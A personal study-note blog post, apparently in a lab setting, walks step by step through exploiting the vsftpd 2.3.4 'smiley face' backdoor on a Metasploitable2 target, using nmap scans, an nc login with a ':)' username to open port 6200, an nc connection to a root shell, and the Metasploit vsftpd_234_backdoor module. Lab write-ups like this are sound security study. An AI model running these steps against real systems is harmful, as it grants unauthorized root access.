此博客为本人学习笔记,如有错误,还请指正。

#vsftpd源码包含后门漏洞
#思路:开放21端口,并且vsftpd版本号为2.3.4
#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。

实验环境
攻击机:kali :192.168.111.128
靶机:Metasploitable2-Linux:192.168.111.132

Metasploitable 的用户名和密码均为:msfadmin

实验步骤

一、直接在kali终端利用漏洞

1、先测试kali与靶机的连通性
在这里插入图片描述
在这里插入图片描述
2、在kali 终端下对靶机ip地址进行扫描,查看端口情况,发现21端口是打开的

nmap 192.168.111.132

在这里插入图片描述
3、继续扫描该端口版本,发现是含有笑脸漏洞的vsftpd版本。

nmap -p 21 192.168.111.132 -sV

在这里插入图片描述4、攻击前我们先查看6200端口情况(此时端口是关闭的)

nmap -p 6200 192.168.111.132

在这里插入图片描述
5、连接21端口并通过笑脸漏洞登录

nc 192.168.111.132 21
user 任意用户名(以“:)”结尾即可)
pass 任意密码

在这里插入图片描述
6、重新打开一个终端,查看6200端口情况,发现已经打开

nmap -p 6200 192.168.111.132

在这里插入图片描述7、在控制台连接6200端口,获得shell,输入whoami,发现是root权限(要在6200端口打开的情况下才能连接成功)

nc 192.168.111.132 6200

在这里插入图片描述

二、用msfconsole利用漏洞

1、打开终端,进入msfconsole
在这里插入图片描述
2、利用search命令查找我们需要的漏洞模块vsftpd(笑脸漏洞)

search vsftpd

在这里插入图片描述
3、使用漏洞,输入命令

use exploit/unix/ftp/vsftpd_234_backdoor

或者

use 0

在这里插入图片描述4、查看需要设置的参数
在这里插入图片描述5、只需设置目标主机的IP即可
在这里插入图片描述
6、设置好后便可以开始执行攻击exploit
在这里插入图片描述7、获得靶机shell
在这里插入图片描述在这里插入图片描述

参考链接:https://blog.csdn.net/qq_51650968/article/details/121129326

如有侵权,请联系删除。

# linux # 安全 # 网络 # 网络安全 # 网络攻击模型
Logo
Linux

更多推荐

网卡速率和双工模式的配置

http://linux.chinaitlab.com/system/792187.html1、mii-tool 配置网络设备协商方式的工具;    1.1 mii-tool 介绍;    mii-tool - view, manipulate media-independent interface status (mii-tool 是查看,管理介质的网络接口的状态)

avatar Linux

Linux虚拟文件系统之文件系统卸载(sys_umount())

Linux中卸载文件系统由umount系统调用实现,入口函数为sys_umount()。较于文件系统的安装较为简单,下面是具体的实现。1. /*sys_umont系统调用*/2. SYSCALL_DEFINE2(umount, char __user *, name, int, flags)3. {4.struct path path;

avatar Linux

Linux系统下超级终端Minicom的使用方法(例如:连接交换机,路由器等)转http://baike.baidu.com/view/2911642.htm?fr=ala0_1

<br />  Linux系统下超级终端Minicom的使用方法 <br />  Linux下的Minicom的功能与下的超级终端功能相似,适于在通过超级终端对设备的管理以及对嵌入操作系统的升级,现写出Minicom的使用手册: <br />  1. 启动minicom <br />  以root权限登录系统 <br />  使用命令 <br />  minicom –s 则minicom启动,屏

avatar Linux